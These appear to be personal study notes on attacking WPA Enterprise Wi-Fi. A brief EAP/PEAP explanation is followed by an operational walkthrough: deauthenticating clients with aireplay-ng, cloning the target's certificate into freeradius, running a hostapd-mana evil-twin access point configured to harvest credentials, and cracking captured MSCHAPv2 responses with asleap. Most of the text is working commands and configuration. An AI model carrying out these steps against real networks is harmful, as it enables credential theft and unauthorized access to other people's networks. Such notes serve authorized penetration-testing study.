###########################################################################################################
WPA ENTERPRISE uses EAP ( Extensible Authentication Protocol) [ AUTH TYPE : MGT ]
   
   The client authenticates using a number of EAP frames, depending on the agreed upon authentication scheme, which are relayed by the AP to the RADIUS(Remote Authentication Dial-In User Service) server. If authentication is successful, the result is then used as Pairwise Master Key (PMK) for the 4-way handshake, as opposed to PSK, where the passphrase is derived to generate the PMK.


Similar Protocols to EAP TLS
 
 Challenge-Handshake Authentication Protocol (CHAP)
 Authentication Protocol (PAP)
 Microsoft CHAP (MS-CHAP)
 MS-CHAPv2

Similar Protocols to EAP TTLS
  
  PEAP(Protected Extensible Authentication Protocol )
  MS-CHAPv2
  
###########################################################################################################

PEAP EXCHANGE

(Theory to analyse a PEAP EXHANGE USING EAP PROTOCOL on WPA ENTERPRISE)

###########################################################################################################

airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c 2 -w Playtronics --output-format pcap --write  wlan0mon
aireplay-ng -0 1 -a <AP MAC> -c <client MAC> mon0 [Capture Handshake file]

wlan.bssid==<bssid>  && eap && tls.handshake.certificate (Open in Wireshark and add filter)

In packet details -> EAP  ( Extensible Authentication Protocol) -> TLS -> Handshake Protocol Certificate -> Certificates -> Select and export packet bytes individually

openssl x509 -inform der -in cert.der -text (OPEN CERTIFICATE)
openssl x509 -inform der -in cert.der -outform pem -out output.crt (base 64 version of der format)

apt install freeradius

• mousepad /etc/freeradius/3.0/certs/ca.cnf
Edit Certificate Authority as per the captured packet bytes l[line 50]
  
mousepad /etc/freeradius/3.0/certs/server.cnf
Edit server as per the captured packet bytes [line 48]

sudo su
cd /etc/freeradius/3.0/certs/
rm dh
make (if certificates already exist then we will have to run " make destroycerts" first)

• mousepad /etc/hostapd-mana/mana.conf

# SSID of the AP
ssid=Playtronics

# EAP user file we created earlier
eap_user_file=/etc/hostapd-mana/mana.eap_user

# Certificate paths created earlier
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key

# Store credentials in that file
mana_credout=/tmp/hostapd.credout

OR

#mana.conf

interface=wlan0
ssid = <ssid1>
hw_mode=g
channel = 6
driver=nl80211
auth_algs=3
wpa=3
wpa_key_mgmt=WPA-EAP
ieee8021x=1
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
dh_file=/root/certs/dhparam.pem
mana_wpe=1
mana_eapsuccess=1
mana_credout=hostapd.creds


#hostapd.eap_user

*     PEAP,TTLS,TLS,FAST
"t"   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2    "pass"   [2]

• mousepad /etc/hostapd-mana/mana.eap _user

*     PEAP,TTLS,TLS,FAST
"t"   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2    "pass"   [2]

sudo  hostapd-mana  /etc/hostapd-mana/mana.conf

VERIFY THE CERTIFICATE BY CONTINUING AND WAIT FOR TARGET TO RECONNECT

apt install asleap
asleap -C ce:b6:98:85:c6:56:59:0c -R 72:79:f6:5a:a4:98:70:f4:58:22:c8:9d:cb:dd:73:c1:b8:9d:37:78:44:ca:ea:d4 -W /usr/share/john/password.lst

cat /tmp/hostapd.credout   [EXCEPTION :  802.11w]

###########################################################################################################







